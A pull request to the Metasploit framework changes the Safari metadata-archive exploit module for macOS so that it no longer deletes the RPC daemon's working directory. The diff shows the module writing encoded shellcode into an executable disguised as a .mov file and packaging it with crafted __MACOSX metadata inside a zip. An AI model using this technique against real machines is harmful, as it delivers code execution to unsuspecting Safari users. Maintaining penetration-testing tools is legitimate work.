### PR TITLE
Fix the current working directory in osx/browser/safari_metadata_archive

### DIFF
--- a/modules/exploits/osx/browser/safari_metadata_archive.rb
+++ b/modules/exploits/osx/browser/safari_metadata_archive.rb
@@ -93,19 +93,20 @@ class Metasploit3 < Msf::Exploit::Remote
 		tmov  = rand_text_alphanumeric(8) + '.mov'
 
 		FileUtils.mkdir(tdir, :mode => 0755)
-		FileUtils.cd(tdir)
 
-		fd = File.new(tmov, "w")
-		fd.write(shellcode.encoded)
-		fd.close
+		::Dir.chdir(tdir) do
+			fd = File.new(tmov, "w")
+			fd.write(shellcode.encoded)
+			fd.close
 
-		FileUtils.mkdir(tdir+'/__MACOSX', :mode => 0755)
-		fd = File.new(tdir+'/__MACOSX/._'+tmov, "w")
-		fd.write(generate_metadata)
-		fd.close
+			FileUtils.mkdir(tdir+'/__MACOSX', :mode => 0755)
+			File.new(tdir+'/__MACOSX/._'+tmov, "w") do |fp|
+				fp.write(generate_metadata)
+			end
 
-		FileUtils.chmod(0755, tmov)
-		system(@zip, "a", tdir+'.zip', tmov, '__MACOSX/._'+tmov)
+			FileUtils.chmod(0755, tmov)
+			system(@zip, "a", tdir+'.zip', tmov, '__MACOSX/._'+tmov)
+		end
 
 		fd = File.new(tdir+'.zip')
 		data = fd.read(fd.stat.size)


### PR DESCRIPTION
This exploit breaks msfrpcd by deleting it's current working directory. 

I'd prefer an approach that didn't change the current working directory at all, but this will suffice for now.
